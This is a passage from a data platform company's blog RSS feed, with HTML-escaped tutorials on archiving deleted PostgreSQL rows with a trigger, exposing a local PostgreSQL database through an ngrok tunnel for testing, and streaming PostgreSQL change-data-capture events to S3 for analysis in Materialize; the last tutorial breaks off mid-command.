&lt;span class=&quot;token keyword&quot;&gt;FOR EACH ROW&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;EXECUTE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;PROCEDURE&lt;/span&gt; moveDeleted&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That’s it.&lt;/p&gt;
&lt;p&gt;If you perform a&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operation on the&lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table, a new row with the deleted data will move to the&lt;code class=&quot;language-text&quot;&gt;Deleted_User&lt;/code&gt; table.&lt;/p&gt;
&lt;p&gt;Now your archive table will begin to populate, data won’t be lost, and you can now monitor the archive table to capture&lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations within your application.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How to Expose PostgreSQL Remotely Using ngrok]]></title><description><![CDATA[Learn how to expose PostgreSQL Remotely Using ngrok. This method allows you to quickly test and analyze the behavior of PostgreSQL with Meroxa.]]></description><link>https://meroxa.com/blog/how-to-expose-postgresql-remotely-using-ngrok</link><guid isPermaLink="false">https://meroxa.com/blog/how-to-expose-postgresql-remotely-using-ngrok</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Mon, 10 May 2021 15:58:00 GMT</pubDate><content:encoded>&lt;p&gt;In this guide, we will walk through exposing a local PostgreSQL instance with&lt;a href=&quot;https://ngrok.com/&quot;&gt;ngrok&lt;/a&gt;. This method allows you to quickly test and analyze the behavior of PostgreSQL with data platforms like&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;.&lt;img src=&quot;https://docs.meroxa.com/assets/images/add-local-pg-meroxa-e37eeb50cf2560f9d1d7b3ee618e738e.png&quot; alt=&quot;Add Local PG&quot;&gt;For this example, we are going to use ngrok. ngrok exposes local servers behind NATs and firewalls to the public internet over secure tunnels.&lt;/p&gt;
&lt;p&gt;Let&apos;s begin.&lt;/p&gt;
&lt;h3&gt;Step One: Running PostgreSQL Locally&lt;/h3&gt;
&lt;p&gt;Before we begin, you&apos;ll need to have&lt;a href=&quot;https://www.postgresql.org/download/&quot;&gt;PostgreSQL installed and running locally&lt;/a&gt;. The easiest and quickest way using&lt;a href=&quot;https://docs.docker.com/get-docker/&quot;&gt;Docker&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;:5432 &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;secret &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_DB&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;demo postgres&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/run-postgres-e475a173c89d144c86da903525cb0da9.png&quot; alt=&quot;Run Postgres&quot;&gt;&lt;/p&gt;
&lt;p&gt;For more details on configuration, see&lt;a href=&quot;https://hub.docker.com/_/postgres&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;postgres&lt;/code&gt; on Docker Hub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Now&lt;/p&gt;
&lt;p&gt;Now that PostgreSQL is running on port&lt;code class=&quot;language-text&quot;&gt;5432&lt;/code&gt;, you can connect to the local database&lt;em&gt;outside&lt;/em&gt; of the container using&lt;a href=&quot;https://www.postgresql.org/13/app-psql.html&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt;&lt;/a&gt; :&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;psql &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-h&lt;/span&gt; localhost &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt; postgres&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Step Two: Running ngrok and Exposing PostgreSQL&lt;/h3&gt;
&lt;p&gt;Next, we can create a tunnel using ngrok and expose the locally running database.&lt;/p&gt;
&lt;p&gt;First, you&apos;ll need to&lt;a href=&quot;https://ngrok.com/download&quot;&gt;download and install ngrok&lt;/a&gt;, and&lt;a href=&quot;https://dashboard.ngrok.com/&quot;&gt;create an account&lt;/a&gt;. Then, you can start the tunnel by running the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;ngrok tcp &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/run-ngrok-4b81e2495a91b50f5cefe6687696b8ce.png&quot; alt=&quot;Run Ngrok&quot;&gt;&lt;/p&gt;
&lt;p&gt;For more information, see&lt;a href=&quot;https://ngrok.com/docs#tcp&quot;&gt;ngrok tcp&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Note: You&apos;ll need to create an ngrok account to use tcp forwarding.&lt;/p&gt;
&lt;h3&gt;Step Three: Connecting to PostgreSQL&lt;a href=&quot;https://docs.meroxa.com/guides/how-to-expose-postgresql-remotely-using-ngrok#step-three-connecting-to-postgresql&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Now that PostgreSQL&lt;em&gt;and&lt;/em&gt; ngrok are running, you can connect to the publically exposed database using&lt;code class=&quot;language-text&quot;&gt;psql&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;psql &lt;span class=&quot;token parameter variable&quot;&gt;-h&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;.tcp.ngrok.io &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;17618&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; postgres&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/run-psql-ngrok-a47095834213073aec9908f5871bdce9.png&quot; alt=&quot;Run Postgres&quot;&gt;That&apos;s it! You can now connect to your local instance over the internet.&lt;/p&gt;
&lt;h3&gt;What&apos;s next?&lt;a href=&quot;https://docs.meroxa.com/guides/how-to-expose-postgresql-remotely-using-ngrok#whats-next&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This method super helpful to quickly test and analyze behavior using PostgreSQL with cloud services. For example, you can add the local PostgreSQL to Meroxa:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create localpg &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://postgres:secret@8.tcp.ngrok.io:19272/demo?sslmode=disable&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Since our database is local, SSL is not enabled by default. To connect, you&apos;ll need to append&lt;code class=&quot;language-text&quot;&gt;?sslmode=disable&lt;/code&gt; to the PostgreSQL connection URL.&lt;/p&gt;
&lt;p&gt;By adding it as a Meroxa Resource, you can easily capture real-time CDC events for every insert, update, delete operation from a local PostgreSQL table. For more, see&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;PostgreSQL Resource Documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Helpful Resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.postgresql.org/download/&quot;&gt;Install PostgreSQL Locally&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://ngrok.com/docs#getting-started&quot;&gt;Getting Started with ngrok&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/anderspitman/awesome-tunneling&quot;&gt;Alternative tunneling solutions&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can&apos;t wait to see what you build 🚀.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Analyze Change Data Capture from PostgreSQL with Meroxa and Materialize]]></title><description><![CDATA[Analyzing the changes that occur to PostgreSQL will give you insight into the current state of the data and allows you to dig into the changes of your database.]]></description><link>https://meroxa.com/blog/analyze-change-data-capture-from-postgresql-with-meroxa-and-materialize</link><guid isPermaLink="false">https://meroxa.com/blog/analyze-change-data-capture-from-postgresql-with-meroxa-and-materialize</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 05 May 2021 19:47:00 GMT</pubDate><content:encoded>&lt;p&gt;Analyzing the changes that occur to PostgreSQL will not only give you insight into the current state of the data within your application but allows you to dig into the&lt;em&gt;changes&lt;/em&gt;of your database.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://materialize.com/&quot;&gt;Materialize&lt;/a&gt; is a streaming database that allows you to query real-time streams using SQL.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; is a platform that enables you to build real-time data pipelines to capture Change Data Capture (CDC) events (every insert, update, and delete) from PostgreSQL and other&lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview&quot;&gt;sources&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Together, you can create real-time pipelines in Meroxa to stream data from various sources to Materialize and analyze them using&lt;a href=&quot;https://materialize.com/streaming-sql-intro/&quot;&gt;Streaming SQL&lt;/a&gt;. The model described in this post offers a robust foundation for a streaming analytics stack.&lt;/p&gt;
&lt;h3&gt;How it works&lt;/h3&gt;
&lt;p&gt;For this example, we will build a query (a&lt;a href=&quot;https://materialize.com/docs/overview/what-is-materialize/#sql--views&quot;&gt;materialized view&lt;/a&gt;) to analyze the count of the operations (inserts, updates, and deletes) performed to Postgres.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*p0DcOgfBk__f2OfBDyJWBw.gif&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;From a high level, here is how it works:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;First, we build a pipeline to capture CDC events (inserts, updates, and deletes) from a PostgreSQL database and stream the events to Amazon S3.&lt;/li&gt;
&lt;li&gt;Then, add Amazon S3 as a materialized source and build a materialized vi&lt;em&gt;ew&lt;/em&gt;to analyze the CDC events.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*Qj0eBtOg7eAvuQWq80r3gg.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;The CDC events are streamed to files within a configured S3 bucket as gzipped JSON. Each S3 object contains multiple records, separated by newlines, in the following format:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;struct&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;fields&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;struct&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;fields&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int32&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
          &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
          &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
          &lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;before&quot;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;resource_217&quot;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;11&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;ec@example.com&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Nell Abbott&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;birthday&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;12/21/1959&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;createdAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874536&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;updatedAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874537&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;11&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;nell-abbott@example.com&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Nell Abbott&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;birthday&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;12/21/1959&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;createdAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874536&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;updatedAt&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255874537&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;source&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1.2.5.Final&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;connector&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;resource-217&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255875129&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;snapshot&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;false&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;db&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my_database&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;public&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;table&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;txId&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;8355&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;lsn&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;478419097256&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;op&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1618255875392&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This record captured from PostgreSQL has two parts: a&lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt; and a&lt;code class=&quot;language-text&quot;&gt;schema&lt;/code&gt;. The&lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt; represents the data captured from the source. In this case, the record contains the operation (&lt;code class=&quot;language-text&quot;&gt;op&lt;/code&gt;) performed, the data before and after the operation. Also, Meroxa will automatically record the&lt;code class=&quot;language-text&quot;&gt;schema&lt;/code&gt; of the payload within the record and capture its changes over time.&lt;/p&gt;
&lt;h3&gt;Prerequisites&lt;/h3&gt;
&lt;p&gt;Before you begin building, you’ll need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;PostgreSQL Database (e.g., &lt;a href=&quot;https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_Tutorials.WebServerDB.CreateDBInstance.html&quot;&gt;Amazon RDS&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.aws.amazon.com/AmazonS3/latest/userguide/create-bucket-overview.html&quot;&gt;AWS S3 Bucket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/docs/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://materialize.com/docs/get-started/&quot;&gt;Materialize CLI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Step 1: Adding Resources to Meroxa&lt;/h3&gt;
&lt;p&gt;To begin, you’ll need a &lt;a href=&quot;http://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; account and the &lt;a href=&quot;https://docs.meroxa.com/docs/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;. Then, you can add resources to your Meroxa Resource Catalog. We can do so with the following commands:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Add PostgreSQL resource:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; resource postgresDB &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-u&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt; &lt;span class=&quot;token parameter 